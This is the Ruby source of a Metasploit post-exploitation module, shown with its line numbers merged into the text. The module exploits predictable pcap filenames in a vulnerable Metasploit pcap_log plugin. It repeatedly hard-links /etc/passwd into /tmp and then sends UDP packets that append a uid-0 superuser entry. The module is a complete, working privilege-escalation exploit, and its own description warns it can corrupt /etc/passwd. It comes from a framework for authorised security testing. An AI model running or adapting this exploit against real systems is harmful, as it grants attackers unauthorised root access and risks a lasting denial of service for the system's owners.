Path: blob/master/modules/post/multi/escalate/metasploit_pcaplog.rb
19591 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6Rank = ManualRanking78include Msf::Post::File910include Msf::Exploit::Local::Linux1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Multi Escalate Metasploit pcap_log Local Privilege Escalation',17'Description' => %q{18Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,19creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these20filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.21This, and all the other packets, are appended to /etc/passwd.2223Successful exploitation results in the creation of a new superuser account.2425This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap26files and truncate /etc/passwd. Note that if this module fails, you can potentially induce27a permanent DoS on the target by corrupting the /etc/passwd file.28},29'License' => MSF_LICENSE,30'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'],31'Platform' => %w[bsd linux unix],32'SessionTypes' => [ 'shell', 'meterpreter' ],33'References' => [34[ 'BID', '54472' ],35[ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],36[ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],37],38'DisclosureDate' => '2012-07-16',39'Stance' => Msf::Exploit::Stance::Passive,40'Notes' => {41'Stability' => [SERVICE_RESOURCE_LOSS],42'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES],43'Reliability' => []44}45)46)47register_options(48[49Opt::RPORT(2940),50OptString.new('USERNAME', [ true, 'Username for the new superuser', 'metasploit' ]),51OptString.new('PASSWORD', [ true, 'Password for the new superuser', 'metasploit' ]),52OptInt.new('MINUTES', [true, 'Number of minutes to try to inject', 5])53]54)55end5657def normalize_minutes58datastore['MINUTES'].abs59rescue StandardError60061end6263def run64fail_with(Failure::NotFound, '/etc/passwd not found on system') unless file_exist?('/etc/passwd')6566initial_size = read_file('/etc/passwd').lines.count67print_status("/etc/passwd is currently #{initial_size} lines long")6869print_status("Setting up the victim's /tmp dir")7071username = datastore['USERNAME']72i = 073j = 074loop do75# Setup links to /etc/passwd76if (i == 0)77j += 178break if j >= datastore['MINUTES'] + 1 # Give up after X minutes7980# 0a2940: cmd_exec is slow, so send 1 command to do all the links81print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"82cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")83end8485current_size = read_file('/etc/passwd').lines.count8687# passwd file line count has changed88break if current_size != initial_size8990# PCAP is flowing91pkt = "\n\n" + username + ':' + datastore['PASSWORD'].crypt('0a') + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"92vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}")93udpsock = Rex::Socket::Udp.create(94{95'Context' => { 'Msf' => framework, 'MsfExploit' => self }96}97)98udpsock.sendto(pkt, session.session_host, datastore['RPORT'])99sleep(1) # wait a second100i = (i + 1) % 60 # increment second counter101end102103if read_file('/etc/passwd').includes?('Metasploit')104print_good("Success. You should now be able to login or su to the '#{username}' account")105# TODO: Consider recording our now-created username and password as a valid credential here.106else107print_error("Failed, the '#{username}' user does not appear to have been added")108end109# 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload110# However beceause the session is not a terminal, su will not always allow this.111end112end113114115